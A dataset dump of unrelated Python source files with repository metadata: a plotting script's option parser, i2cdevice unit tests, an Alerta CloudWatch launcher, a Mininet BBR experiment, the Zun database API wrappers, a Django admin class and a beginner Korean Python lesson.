startRow=int(v)
elif a in ["-r","--headerRow"]:
headerRow=int(v)
elif a in ["-p","--showIndPoints"]:
showIndPoints=True
elif a in ["-m","--showMean"]:
showMean=True
elif a in ["-n","--notch"]:
notch=1
elif a in ["--offOutliers"]:
outliers=False
elif a in ["--offWhisker"]:
whisker=False
elif a in ["--pvalue-cluster-as"]:
makePvalueClusters=True
pvalueClusterOutputPrefix=v
elif a in ["--pvalue-cluster-method"]:
pvalueClusterMethod=v
elif a in ["--xtick-rotation"]:
xlegendrotation=int(v)
elif a in ["--xlabel"]:
xlabe=v
elif a in ["--ylabel"]:
ylabe=v
elif a in ["--figsize"]:
v=v.split(",")
figsz=(int(v[0]),int(v[1]))
elif a in ["--title"]:
titl=v
elif a in ["--show-sample-sizes"]:
showSampleSizes=True
elif a in ["--trim-to-min-size"]:
trimToMinSize=True
elif a in ["--relabel-as"]:
print >> stderr,"v=",v
relabels=v.split(",")
elif a in ['--log']:
logb=log(float(v))
elif a in ['--plot-hist']:
plotHistogramToFile=v
elif a in ['--plot-median-for-group']:
plotMedianForGroups.append(v)
elif a in ['--bottom']:
botta=float(v)
elif a in ['--hide-violin']:
showViolin=False
elif a in ['--hide-box']:
showBox=False
elif a in ['--first-col-annot']:
firstColAnnot=True
elif a in ['--plot-trend']:
plotTrend=True
elif a in ['--show-legend']:
showLegend=True
elif a in ['--out-pzfx']:
makePzfxFile=v.split(",")
elif a in ['--out-bin-matrix']:
makeBinMatrix=v.split(",")
#print >> stderr,makeBinMatrix
makeBinMatrix[1]=int(makeBinMatrix[1])
elif a in ['--min-num-data-to-keep']:
minNDataToKeep=int(v)
elif a in ['--data-summary-stat-range']:
mi,ma=v.split(",")
summaryStatRange=[]
try:
mi=float(mi)
summaryStatRange.append(mi)
except:
summaryStatRange.append(None)
try:
ma=float(ma)
summaryStatRange.append(ma)
except:
summaryStatRange.append(None)
elif a in ['--write-data-summary-stat']:
writeDataSummaryStat=v
elif a in ['--minus-log10-pvalue']:
minuslog10pvalue=True
elif a in ['--valpha']:
valapha=float(v)
elif a in ['--vfacecolor']:
vrgba=v.split(",")
if len(vrgba)<3:
vfacecolor=v
else:
vfacecolor=[]
for vr in vrgba:
vfacecolor.append(float(vr))
valpha=vfacecolor[3]
elif a in ['--outXYZPvalues']:
outXYZPvalues=v
elif a in ['--ylims']:
yl=v.split(",")
ylims=[float(yl[0]),float(yl[1])]
elif a in ['--whisker-style']:
whiskerStyle=v
elif a in ['--axhline']:
v=v.split(",")
axhlines.append(v) #[float(v[0]),v[1],v[2]])
elif a in ['--skip-stat']:
skipStat=True
elif a in ['--divide-plots']:
dividePlots=[float(x) for x in v.split(",")]
except:
traceback.print_stack()
usageExit(programName)
#print >> stderr,args
for i in range(1,len(args),2):
thisFilenames=glob(args[i])
valcolstring=args[i+1]
filenames.extend(thisFilenames)
for filenam in thisFilenames:
header,prestarts=getHeader(filenam,headerRow,startRow,fs)
cols=getCol0ListFromCol1ListStringAdv(header,valcolstring)
print >> stderr, thisFilenames, cols
valcols.append(cols)
headers.append(header)
if makePvalueClusters:
from Bio.Cluster.cluster import *
from Bio.Cluster import *
if showLegend:
figsz=(figsz[0]*2,figsz[1])
if makePzfxFile:
makePzfxFile+=[pzfxTableRefID]
plotExpBox_Main(filenames,headers,valcols,outputFile,fs,startRow,showIndPoints,'bo','g--',showMean,notch,whisker,outliers,makePvalueClusters,pvalueClusterOutputPrefix,pvalueClusterMethod,xlegendrotation,xlabe,ylabe,figsz,titl,showSampleSizes,trimToMinSize,relabels,logb,plotHistogramToFile,plotMedianForGroups,botta,showViolin,showBox,firstColAnnot,plotTrend,showLegend,makePzfxFile,makeBinMatrix,writeDataSummaryStat,summaryStatRange,minuslog10pvalue,minNDataToKeep,vfacecolor,valpha,outXYZPvalues,dividePlots)
|
[
"[email protected]"
] | |
a33ad1849151ab394185e17bf2023a657ad79628
|
0f1746146e1514bf20c25135cc624353d9c1a08e
|
/library/tests/test_utils.py
|
eac382d89c2518bb45a057b1b36500217a1f392b
|
[
"MIT"
] |
permissive
|
kklimek/i2cdevice-python
|
4bdb9ed46c109e78bc54cf512b98029705e34f10
|
54690cea60cbd91d8abffad38dcba3475236439b
|
refs/heads/master
| 2020-08-04T06:20:40.253068 | 2019-10-01T07:37:15 | 2019-10-02T13:59:32 | 212,036,695 | 0 | 0 |
MIT
| 2019-10-01T07:28:23 | 2019-10-01T07:28:23 | null |
UTF-8
|
Python
| false | false | 898 |
py
|
from i2cdevice import _mask_width, _leading_zeros, _trailing_zeros, _int_to_bytes
import pytest
def test_mask_width():
assert _mask_width(0b111) == 3
assert _mask_width(0b101) == 3
assert _mask_width(0b0111) == 3
assert _mask_width(0b1110) == 3
def test_leading_zeros():
assert _leading_zeros(0b1) == 7
assert _leading_zeros(0b10) == 6
assert _leading_zeros(0b100) == 5
assert _leading_zeros(0b100000000) == 8 # 9nth bit not counted by default
def test_trailing_zeros():
assert _trailing_zeros(0b1) == 0
assert _trailing_zeros(0b10) == 1
assert _trailing_zeros(0b100) == 2
assert _trailing_zeros(0b00000000) == 8 # Mask is all zeros
def test_int_to_bytes():
assert _int_to_bytes(512, 2) == b'\x02\x00'
assert _int_to_bytes(512, 2, endianness='little') == b'\x00\x02'
with pytest.raises(TypeError):
_int_to_bytes('', 2)
|
[
"[email protected]"
] | |
64121605ca20b778ed7290a0e87d052fbb42dfd3
|
0cff676ec482e23ee4d9867659f553aa3b7c7a3d
|
/bin/alert-cloudwatch
|
7873c24de514052ecc7a0799763db3b407e84069
|
[
"Apache-2.0"
] |
permissive
|
jaxxstorm/alerta
|
46db7e510ca3cc430e0235a526752615ad2bed18
|
af33dc951305134792f03b3ea0d8e49c32d69918
|
refs/heads/master
| 2020-12-25T03:20:19.934180 | 2014-06-21T20:58:44 | 2014-06-21T20:58:44 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 868 |
#!/usr/bin/env python
########################################
#
# alert-cloudwatch - Alert AWS CloudWatch
#
########################################
import os
import sys
possible_topdir = os.path.normpath(os.path.join(os.path.abspath(sys.argv[0]),
os.pardir,
os.pardir))
if os.path.exists(os.path.join(possible_topdir, 'alerta', '__init__.py')):
sys.path.insert(0, possible_topdir)
from alerta.common import config
from alerta.common import log as logging
from alerta.cloudwatch.daemon import CloudWatchDaemon, __version__
LOG = logging.getLogger('alerta.cloudwatch')
CONF = config.CONF
if __name__ == '__main__':
config.parse_args(version=__version__)
logging.setup('alerta')
cloudwatch = CloudWatchDaemon('alert-cloudwatch')
cloudwatch.start()
|
[
"[email protected]"
] | ||
53435264f240904694179d2c3e32b6a930f22b9d
|
a88db875957d20f349d80cff48572ceb60881840
|
/bbr.py
|
dd6f495db12ecc8bd708c5fb2a0113a96f783803
|
[] |
no_license
|
mfkiwl/when-to-use-bbr
|
5f7d0f31768f93f2dc5448b8b9505860fcb1c4e2
|
a5eb4919d2193cbb750ee982df9f9c449afdf16c
|
refs/heads/master
| 2023-04-29T00:25:18.413169 | 2021-05-08T20:22:54 | 2021-05-08T20:22:54 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,084 |
py
|
import argparse
import mininet.topo
import mininet.net
import mininet.node
import mininet.link
import mininet.net
import mininet.util
import mininet.clean
from remote import RemoteHost, RemoteSSHLink, RemoteOVSSwitch
class Topology(mininet.topo.Topo):
def __init__(self, config):
self.config = config
# in Section 3.1, the paper mentioned that the delay between h1/h2 and h3 is 40us
self._min_delay = "{0}us".format(40 / 2)
super(Topology, self).__init__()
def build(self):
h1 = self.addHost("h1")
h2 = self.addHost("h2")
h3 = self.addHost("h3", server=self.config.remote_host, user=self.config.remote_user,
port=self.config.remote_host_port)
s1 = self.addSwitch("s1")
# add link
self.addLink(h1, s1, bw=self.config.bw, delay=self._min_delay)
self.addLink(h2, s1, bw=self.config.bw, delay=self._min_delay)
self.addLink(s1, h3, bw=self.config.bw, delay="{0}ms".format(self.config.rtt / 2))
def run(configs):
# clean up previous mininet runs in case of crashes
mininet.clean.cleanup()
topology = Topology(configs)
if configs.remote_host != "localhost":
net = mininet.net.Mininet(topology, host=RemoteHost, link=RemoteSSHLink, switch=RemoteOVSSwitch,
waitConnected=True)
else:
net = mininet.net.Mininet(topology, host=mininet.node.CPULimitedHost, link=mininet.link.TCLink)
net.start()
if configs.debug:
# test out the component
mininet.util.dumpNetConnections(net)
net.pingAll()
# clean up at the end
mininet.clean.cleanup()
def main():
parser = argparse.ArgumentParser("BBR experiments")
parser.add_argument("-c", "--congestion-control", choices=["bbr", "cubic"], default="bbr",
help="h1 and h2 congestion control algorithm type", type=str, dest="cc")
parser.add_argument("--rtt", choices=[5, 10, 25, 50, 75, 100, 150, 200], default=5,
help="RTT for the bottle net link", type=int, dest="rtt")
parser.add_argument("--bw", choices=[10, 20, 50, 100, 250, 500, 1000], default=10,
help="Bandwidth for the bottleneck link", type=int, dest="bw")
parser.add_argument("-s", "--size", "--buffer-size", choices=[0.1, 1, 10, 20, 50], default=0.1,
help="Switch buffer size", type=float, dest="size")
parser.add_argument("--remote-host", default="localhost", type=str, dest="remote_host",
help="remote host name/IP address")
parser.add_argument("--remote-host-port", default=22, type=int, dest="remote_host_port",
help="remote host port number to ssh in")
parser.add_argument("--remote-user", default="", type=str, dest="remote_user",
help="remote host user name")
parser.add_argument("--debug", action="store_true", dest="debug")
args = parser.parse_args()
# run the experiments
run(args)
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
3c9b2a28147271a35e418c0f478a1a5f33b742d5
|
490ffe1023a601760ae7288e86723f0c6e366bba
|
/kolla-docker/zun/zun/db/api_provideraccount.py
|
8c57c51969385a3f449a8780ca8f3cddad05ccc4
|
[
"Apache-2.0"
] |
permissive
|
bopopescu/Cloud-User-Management
|
89696a5ea5d2f95191327fbeab6c3e400bbfb2b8
|
390988bf4915a276c7bf8d96b62c3051c17d9e6e
|
refs/heads/master
| 2022-11-19T10:09:36.662906 | 2018-11-07T20:28:31 | 2018-11-07T20:28:31 | 281,786,345 | 0 | 0 | null | 2020-07-22T21:26:07 | 2020-07-22T21:26:06 | null |
UTF-8
|
Python
| false | false | 27,668 |
py
|
# Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Base API for Database
"""
from oslo_db import api as db_api
from zun.common import exception
from zun.common.i18n import _
from zun.common import profiler
import zun.conf
import logging
LOG = logging.getLogger(__name__)
"""Add the database backend mapping here"""
CONF = zun.conf.CONF
_BACKEND_MAPPING = {'sqlalchemy': 'zun.db.sqlalchemy.api'}
IMPL = db_api.DBAPI.from_config(CONF,
backend_mapping=_BACKEND_MAPPING,
lazy=True)
@profiler.trace("db")
def _get_dbdriver_instance():
"""Return a DB API instance."""
return IMPL
@profiler.trace("db")
def list_provideraccounts(context, filters=None, limit=None, marker=None,
sort_key=None, sort_dir=None):
"""List matching provideraccounts.
Return a list of the specified columns for all provideraccounts that match
the specified filters.
:param context: The security context
:param filters: Filters to apply. Defaults to None.
:param limit: Maximum number of provideraccounts to return.
:param marker: the last item of the previous page; we return the next
result set.
:param sort_key: Attribute by which results should be sorted.
:param sort_dir: Direction in which results should be sorted.
(asc, desc)
:returns: A list of tuples of the specified columns.
"""
return _get_dbdriver_instance().list_provideraccounts(
context, filters, limit, marker, sort_key, sort_dir)
@profiler.trace("db")
def create_provideraccount(context, values):
"""Create a new provideraccount.
:param context: The security context
:param values: A dict containing several items used to identify
and track the provideraccount, and several dicts which are
passed
into the Drivers when managing this provideraccount. For
example:
::
{
'uuid': uuidutils.generate_uuid(),
'name': 'example',
'type': 'virt'
}
:returns: A provideraccount.
"""
return _get_dbdriver_instance().create_provideraccount(context, values)
@profiler.trace("db")
def get_provideraccount_by_uuid(context, provideraccount_uuid):
"""Return a provideraccount.
:param context: The security context
:param provideraccount_uuid: The uuid of a provideraccount.
:returns: A provideraccount.
"""
return _get_dbdriver_instance().get_provideraccount_by_uuid(
context, provideraccount_uuid)
@profiler.trace("db")
def get_provideraccount_by_name(context, provideraccount_name):
"""Return a provideraccount.
:param context: The security context
:param provideraccount_name: The name of a provideraccount.
:returns: A provideraccount.
"""
return _get_dbdriver_instance().get_provideraccount_by_name(
context, provideraccount_name)
@profiler.trace("db")
def destroy_provideraccount(context, provideraccount_id):
"""Destroy a provideraccount and all associated interfaces.
:param context: Request context
:param provideraccount_id: The id or uuid of a provideraccount.
"""
return _get_dbdriver_instance().destroy_provideraccount(context, provideraccount_id)
@profiler.trace("db")
def update_provideraccount(context, provideraccount_id, values):
"""Update properties of a provideraccount.
:context: Request context
:param provideraccount_id: The id or uuid of a provideraccount.
:values: The properties to be updated
:returns: A provideraccount.
:raises: ContainerNotFound
"""
return _get_dbdriver_instance().update_provideraccount(
context, provideraccount_id, values)
@profiler.trace("db")
def list_containers(context, filters=None, limit=None, marker=None,
sort_key=None, sort_dir=None):
"""List matching containers.
Return a list of the specified columns for all containers that match
the specified filters.
:param context: The security context
:param filters: Filters to apply. Defaults to None.
:param limit: Maximum number of containers to return.
:param marker: the last item of the previous page; we return the next
result set.
:param sort_key: Attribute by which results should be sorted.
:param sort_dir: Direction in which results should be sorted.
(asc, desc)
:returns: A list of tuples of the specified columns.
"""
return _get_dbdriver_instance().list_containers(
context, filters, limit, marker, sort_key, sort_dir)
@profiler.trace("db")
def create_container(context, values):
"""Create a new container.
:param context: The security context
:param values: A dict containing several items used to identify
and track the container, and several dicts which are
passed
into the Drivers when managing this container. For
example:
::
{
'uuid': uuidutils.generate_uuid(),
'name': 'example',
'type': 'virt'
}
:returns: A container.
"""
return _get_dbdriver_instance().create_container(context, values)
@profiler.trace("db")
def get_container_by_uuid(context, container_uuid):
"""Return a container.
:param context: The security context
:param container_uuid: The uuid of a container.
:returns: A container.
"""
return _get_dbdriver_instance().get_container_by_uuid(
context, container_uuid)
@profiler.trace("db")
def get_container_by_name(context, container_name):
"""Return a container.
:param context: The security context
:param container_name: The name of a container.
:returns: A container.
"""
return _get_dbdriver_instance().get_container_by_name(
context, container_name)
@profiler.trace("db")
def destroy_container(context, container_id):
"""Destroy a container and all associated interfaces.
:param context: Request context
:param container_id: The id or uuid of a container.
"""
return _get_dbdriver_instance().destroy_container(context, container_id)
@profiler.trace("db")
def update_container(context, container_id, values):
"""Update properties of a container.
:context: Request context
:param container_id: The id or uuid of a container.
:values: The properties to be updated
:returns: A container.
:raises: ContainerNotFound
"""
return _get_dbdriver_instance().update_container(
context, container_id, values)
@profiler.trace("db")
def destroy_zun_service(host, binary):
"""Destroys a zun_service record.
:param host: The host on which the service resides.
:param binary: The binary file name of the service.
:returns: A zun service record.
"""
return _get_dbdriver_instance().destroy_zun_service(host, binary)
@profiler.trace("db")
def update_zun_service(host, binary, values):
"""Update properties of a zun_service.
:param host: The host on which the service resides.
:param binary: The binary file name of the service.
:param values: The attributes to be updated.
:returns: A zun service record.
"""
return _get_dbdriver_instance().update_zun_service(host, binary, values)
@profiler.trace("db")
def get_zun_service(context, host, binary):
"""Return a zun_service record.
:param context: The security context
:param host: The host where the binary is located.
:param binary: The name of the binary.
:returns: A zun_service record.
"""
return _get_dbdriver_instance().get_zun_service(host, binary)
@profiler.trace("db")
def create_zun_service(values):
"""Create a new zun_service record.
:param values: A dict containing several items used to identify
and define the zun_service record.
:returns: A zun_service record.
"""
return _get_dbdriver_instance().create_zun_service(values)
@profiler.trace("db")
def list_zun_services(context, filters=None, limit=None,
marker=None, sort_key=None, sort_dir=None):
"""Get matching zun_service records.
Return a list of the specified columns for all zun_services
those match the specified filters.
:param context: The security context
:param disabled: Filters disbaled services. Defaults to None.
:param limit: Maximum number of zun_services to return.
:param marker: the last item of the previous page; we return the next
result set.
:param sort_key: Attribute by which results should be sorted.
:param sort_dir: Direction in which results should be sorted.
(asc, desc)
:returns: A list of tuples of the specified columns.
"""
return _get_dbdriver_instance().list_zun_services(
filters, limit, marker, sort_key, sort_dir)
@profiler.trace("db")
def list_zun_services_by_binary(context, binary):
"""List matching zun services.
Return a list of the specified binary.
:param context: The security context
:param binary: The name of the binary.
:returns: A list of tuples of the specified binary.
"""
return _get_dbdriver_instance().list_zun_services_by_binary(binary)
@profiler.trace("db")
def pull_image(context, values):
"""Create a new image.
:param context: The security context
:param values: A dict containing several items used to identify
and track the image, and several dicts which are
passed
into the Drivers when managing this image. For
example:
::
{
'uuid': uuidutils.generate_uuid(),
'repo': 'hello-world',
'tag': 'latest'
}
:returns: An image.
"""
return _get_dbdriver_instance().pull_image(context, values)
@profiler.trace("db")
def update_image(image_id, values):
"""Update properties of an image.
:param container_id: The id or uuid of an image.
:returns: An Image.
:raises: ImageNotFound
"""
return _get_dbdriver_instance().update_image(image_id, values)
@profiler.trace("db")
def list_images(context, filters=None,
limit=None, marker=None,
sort_key=None, sort_dir=None):
"""Get matching images.
Return a list of the specified columns for all images that
match the specified filters.
:param context: The security context
:param filters: Filters to apply. Defaults to None.
:param limit: Maximum number of images to return.
:param marker: the last item of the previous page; we
return the next
:param sort_key: Attribute by which results should be sorted.
:param sort_dir: Direction in which results should be sorted.
(asc, desc)
:returns: A list of tuples of the specified columns.
"""
return _get_dbdriver_instance().list_images(
context, filters, limit, marker, sort_key, sort_dir)
@profiler.trace("db")
def get_image_by_id(context, image_id):
"""Return an image.
:param context: The security context
:param image_id: The id of an image.
:returns: An image.
"""
return _get_dbdriver_instance().get_image_by_id(context, image_id)
@profiler.trace("db")
def get_image_by_uuid(context, image_uuid):
"""Return an image.
:param context: The security context
:param image_uuid: The uuid of an image.
:returns: An image.
"""
return _get_dbdriver_instance().get_image_by_uuid(context, image_uuid)
@profiler.trace("db")
def list_resource_provideraccounts(context, filters=None, limit=None, marker=None,
sort_key=None, sort_dir=None):
"""Get matching resource provideraccounts.
Return a list of the specified columns for all resource provideraccounts that
match the specified filters.
:param context: The security context
:param filters: Filters to apply. Defaults to None.
:param limit: Maximum number of resource provideraccounts to return.
:param marker: the last item of the previous page; we
return the next
:param sort_key: Attribute by which results should be sorted.
(asc, desc)
:returns: A list of tuples of the specified columns.
"""
return _get_dbdriver_instance().list_resource_provideraccounts(
context, filters, limit, marker, sort_key, sort_dir)
@profiler.trace("db")
def create_resource_provideraccount(context, values):
"""Create a new resource provideraccount.
:param context: The security context
:param values: A dict containing several items used to identify and
track the resource provideraccount, and several dicts which are
passed into the Drivers when managing this resource
provideraccount.
:returns: A resource provideraccount.
"""
return _get_dbdriver_instance().create_resource_provideraccount(context, values)
@profiler.trace("db")
def get_resource_provideraccount(context, provideraccount_ident):
"""Return a resource provideraccount.
:param context: The security context
:param provideraccount_ident: The uuid or name of a resource provideraccount.
:returns: A resource provideraccount.
"""
return _get_dbdriver_instance().get_resource_provideraccount(
context, provideraccount_ident)
@profiler.trace("db")
def destroy_resource_provideraccount(context, provideraccount_id):
"""Destroy a resource provideraccount and all associated interfaces.
:param context: Request context
:param provideraccount_id: The id or uuid of a resource provideraccount.
"""
return _get_dbdriver_instance().destroy_resource_provideraccount(
context, provideraccount_id)
@profiler.trace("db")
def update_resource_provideraccount(context, provideraccount_id, values):
"""Update properties of a resource provideraccount.
:context: Request context
:param provideraccount_id: The id or uuid of a resource provideraccount.
:values: The properties to be updated
:returns: A resource provideraccount.
:raises: ResourceProvideraccountNotFound
"""
return _get_dbdriver_instance().update_resource_provideraccount(
context, provideraccount_id, values)
@profiler.trace("db")
def list_resource_classes(context, limit=None, marker=None, sort_key=None,
sort_dir=None):
"""Get matching resource classes.
Return a list of the specified columns for all resource classes.
:param context: The security context
:param limit: Maximum number of resource classes to return.
:param marker: the last item of the previous page; we
return the next
:param sort_key: Attribute by which results should be sorted.
:param sort_dir: Direction in which results should be sorted.
(asc, desc)
:returns: A list of tuples of the specified columns.
"""
return _get_dbdriver_instance().list_resource_classes(
context, limit, marker, sort_key, sort_dir)
@profiler.trace("db")
def create_resource_class(context, values):
"""Create a new resource class.
:param context: The security context
:param values: A dict containing several items used to identify
and track the resource class, and several dicts which are
passed into the Drivers when managing this resource class.
:returns: A resource class.
"""
return _get_dbdriver_instance().create_resource_class(context, values)
@profiler.trace("db")
def get_resource_class(context, resource_ident):
"""Return a resource class.
:param context: The security context
:param resource_ident: The uuid or name of a resource class.
:returns: A resource class.
"""
return _get_dbdriver_instance().get_resource_class(
context, resource_ident)
@profiler.trace("db")
def destroy_resource_class(context, resource_uuid):
"""Destroy a resource class and all associated interfaces.
:param context: Request context
:param resource_uuid: The uuid of a resource class.
"""
return _get_dbdriver_instance().destroy_resource_class(
context, resource_uuid)
@profiler.trace("db")
def update_resource_class(context, resource_uuid, values):
"""Update properties of a resource class.
:context: Request context
:param resource_uuid: The uuid of a resource class.
:values: The properties to be updated
:returns: A resource class.
:raises: ResourceClassNotFound
"""
return _get_dbdriver_instance().update_resource_class(
context, resource_uuid, values)
@profiler.trace("db")
def list_inventories(context, filters=None, limit=None, marker=None,
sort_key=None, sort_dir=None):
"""List matching inventories.
Return a list of the specified columns for all inventories that match
the specified filters.
:param context: The security context
:param filters: Filters to apply. Defaults to None.
:param limit: Maximum number of inventories to return.
:param marker: the last item of the previous page; we return the next
result set.
:param sort_key: Attribute by which results should be sorted.
:param sort_dir: Direction in which results should be sorted.
(asc, desc)
:returns: A list of tuples of the specified columns.
"""
return _get_dbdriver_instance().list_inventories(
context, filters, limit, marker, sort_key, sort_dir)
@profiler.trace("db")
def create_inventory(context, provideraccount_id, values):
"""Create a new inventory.
:param context: The security context
:param provideraccount_id: The id of a resource provideraccount.
:param values: A dict containing several items used to identify
and track the inventory, and several dicts which are
passed into the Drivers when managing this inventory.
:returns: An inventory.
"""
return _get_dbdriver_instance().create_inventory(
context, provideraccount_id, values)
@profiler.trace("db")
def get_inventory(context, inventory_ident):
"""Return a inventory.
:param context: The security context
:param inventory_ident: The id or name of an inventory.
:returns: An inventory.
"""
return _get_dbdriver_instance().get_inventory(
context, inventory_ident)
@profiler.trace("db")
def destroy_inventory(context, inventory_id):
"""Destroy an inventory and all associated interfaces.
:param context: Request context
:param inventory_id: The id of a inventory.
"""
return _get_dbdriver_instance().destroy_inventory(context, inventory_id)
@profiler.trace("db")
def update_inventory(context, inventory_id, values):
"""Update properties of an inventory.
:context: Request context
:param inventory_id: The id of an inventory.
:values: The properties to be updated
:returns: An inventory.
:raises: InventoryNotFound
"""
return _get_dbdriver_instance().update_inventory(
context, inventory_id, values)
@profiler.trace("db")
def list_allocations(context, filters=None, limit=None, marker=None,
sort_key=None, sort_dir=None):
"""List matching allocations.
Return a list of the specified columns for all allocations that match
the specified filters.
:param context: The security context
:param filters: Filters to apply. Defaults to None.
:param limit: Maximum number of allocations to return.
:param marker: the last item of the previous page; we return the next
result set.
:param sort_key: Attribute by which results should be sorted.
:param sort_dir: Direction in which results should be sorted.
(asc, desc)
:returns: A list of tuples of the specified columns.
"""
return _get_dbdriver_instance().list_allocations(
context, filters, limit, marker, sort_key, sort_dir)
@profiler.trace("db")
def create_allocation(context, values):
"""Create a new allocation.
:param context: The security context
:param values: A dict containing several items used to identify
and track the allocation, and several dicts which are
passed into the Drivers when managing this allocation.
:returns: An allocation.
"""
return _get_dbdriver_instance().create_allocation(context, values)
@profiler.trace("db")
def get_allocation(context, allocation_id):
"""Return an allocation.
:param context: The security context
:param allocation_id: The id of an allocation.
:returns: An allocation.
"""
return _get_dbdriver_instance().get_allocation(context, allocation_id)
@profiler.trace("db")
def destroy_allocation(context, allocation_id):
"""Destroy an allocation and all associated interfaces.
:param context: Request context
:param allocation_id: The id of an allocation.
"""
return _get_dbdriver_instance().destroy_allocation(context, allocation_id)
@profiler.trace("db")
def update_allocation(context, allocation_id, values):
"""Update properties of an allocation.
:context: Request context
:param allocation_id: The id of an allocation.
:values: The properties to be updated
:returns: An allocation.
:raises: AllocationNotFound
"""
return _get_dbdriver_instance().update_allocation(
context, allocation_id, values)
@profiler.trace("db")
def list_compute_nodes(context, filters=None, limit=None, marker=None,
sort_key=None, sort_dir=None):
"""List matching compute nodes.
Return a list of the specified columns for all compute nodes that match
the specified filters.
:param context: The security context
:param filters: Filters to apply. Defaults to None.
:param limit: Maximum number of compute nodes to return.
:param marker: the last item of the previous page; we return the next
result set.
:param sort_key: Attribute by which results should be sorted.
:param sort_dir: Direction in which results should be sorted.
(asc, desc)
:returns: A list of tuples of the specified columns.
"""
return _get_dbdriver_instance().list_compute_nodes(
context, filters, limit, marker, sort_key, sort_dir)
@profiler.trace("db")
def create_compute_node(context, values):
"""Create a new compute node.
:param context: The security context
:param values: A dict containing several items used to identify
and track the compute node, and several dicts which are
passed into the Drivers when managing this compute node.
:returns: A compute node.
"""
return _get_dbdriver_instance().create_compute_node(context, values)
@profiler.trace("db")
def get_compute_node(context, node_uuid):
"""Return a compute node.
:param context: The security context
:param node_uuid: The uuid of a compute node.
:returns: A compute node.
"""
return _get_dbdriver_instance().get_compute_node(context, node_uuid)
@profiler.trace("db")
def get_compute_node_by_hostname(context, hostname):
"""Return a compute node.
:param context: The security context
:param hostname: The hostname of a compute node.
:returns: A compute node.
"""
return _get_dbdriver_instance().get_compute_node_by_hostname(
context, hostname)
@profiler.trace("db")
def destroy_compute_node(context, node_uuid):
"""Destroy a compute node and all associated interfaces.
:param context: Request context
:param node_uuid: The uuid of a compute node.
"""
return _get_dbdriver_instance().destroy_compute_node(context, node_uuid)
@profiler.trace("db")
def update_compute_node(context, node_uuid, values):
"""Update properties of a compute node.
:context: Request context
:param node_uuid: The uuid of a compute node.
:values: The properties to be updated
:returns: A compute node.
:raises: ComputeNodeNotFound
"""
return _get_dbdriver_instance().update_compute_node(
context, node_uuid, values)
@profiler.trace("db")
def list_capsules(context, filters=None, limit=None, marker=None,
sort_key=None, sort_dir=None):
"""List matching capsules.
Return a list of the specified columns for all capsules that match
the specified filters.
:param context: The security context
:param filters: Filters to apply. Defaults to None.
:param limit: Maximum number of capsules to return.
:param marker: the last item of the previous page; we return the next
result set.
:param sort_key: Attribute by which results should be sorted.
:param sort_dir: Direction in which results should be sorted.
(asc, desc)
:returns: A list of tuples of the specified columns.
"""
return _get_dbdriver_instance().list_capsules(
context, filters, limit, marker, sort_key, sort_dir)
@profiler.trace("db")
def create_capsule(context, values):
"""Create a new capsule.
:param context: The security context
:param values: A dict containing several items used to identify
and track the container, and several dicts which are
passed into the Drivers when managing this container.
For example:
::
{
'uuid': uuidutils.generate_uuid(),
'restart_policy': 'always',
'project_id': '***'
}
:returns: A capsule.
"""
return _get_dbdriver_instance().create_capsule(context, values)
@profiler.trace("db")
def get_capsule_by_uuid(context, capsule_uuid):
"""Return a container.
:param context: The security context
:param capsule_uuid: The uuid of a capsule.
:returns: A capsule.
"""
return _get_dbdriver_instance().get_capsule_by_uuid(
context, capsule_uuid)
@profiler.trace("db")
def destroy_capsule(context, capsule_id):
"""Destroy a container and all associated interfaces.
:param context: Request context
:param capsule_id: The id or uuid of a capsule.
"""
return _get_dbdriver_instance().destroy_capsule(context, capsule_id)
@profiler.trace("db")
def update_capsule(context, capsule_id, values):
"""Update properties of a container.
:context: Request context
:param container_id: The id or uuid of a capsule.
:values: The properties to be updated
:returns: A capsule.
:raises: CapsuleNotFound
"""
return _get_dbdriver_instance().update_capsule(
context, capsule_id, values)
|
[
"[email protected]"
] | |
d07b6032abc8c0e3f237db652599fa785edfa2dc
|
488c20476d5528c7e942e09f4c88422f67b86853
|
/pages/admin.py
|
c117c10318328e8ee13a42ba8672a5148b952413
|
[] |
no_license
|
DaniTodorowa/DjangoToHeroku
|
e8b600cd07a5864905d6a34f08edcc31a69e4e1b
|
2df26ecc429cdca0643c174d81ff77ca5930e145
|
refs/heads/master
| 2023-02-05T17:17:32.756299 | 2020-12-21T19:10:22 | 2020-12-21T19:10:22 | 319,601,871 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 610 |
py
|
from django.contrib import admin
from pages.models import Team
from django.utils.html import format_html
class TeamAdmin(admin.ModelAdmin):
def thumbnail(self, object):
return format_html('<img src="{}" width="40" style="border-radius:50px;" />'.format(object.photo.url))
thumbnail.short_description = 'Photo'
list_display = ('id', 'thumbnail', 'first_name', 'designation', 'created_date')
list_display_links = ('id', 'thumbnail', 'first_name')
search_fields = ('first_name', 'last_name', 'designation')
list_filter = ('designation',)
admin.site.register(Team, TeamAdmin)
|
[
"[email protected]"
] | |
86cab9c16847bab1698333842dec26244522d89a
|
f1d3aabacc69d1622e6005100e9d2f139b08e4f3
|
/chapter_5/ch5-40.naming.py
|
a12c706f6277c5ce300306fa60ba5acec216f12d
|
[] |
no_license
|
tschoi6712/HelloCodingPython
|
2d49369df97c2eb3b87823ab084674f49e653043
|
0701dcb4715c4e15d049843e82042f92a5784a97
|
refs/heads/master
| 2020-07-27T08:16:43.291222 | 2019-09-17T10:44:52 | 2019-09-17T10:44:52 | 209,026,500 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 618 |
py
|
"""""""""""""""""""""""""""
코드에 이름 붙이기
"""""""""""""""""""""""""""
# 주석이 붙어 있는 코드
number_input = input("숫자 입력> ")
radius = float(number_input)
print(2 * 3.14 * radius) # 원의 둘레
print(3.14 * radius * radius) # 원의 넓이
# 함수를 횔용한 코드
PI = 3.14
def number_input():
output = input("숫자 입력> ")
return float(output)
def get_circumference(radius):
return 2 * PI * radius
def get_circle_area(radius):
return PI * radius * radius
radius = number_input()
print(get_circumference(radius))
print(get_circle_area(radius))
|
[
"[email protected]"
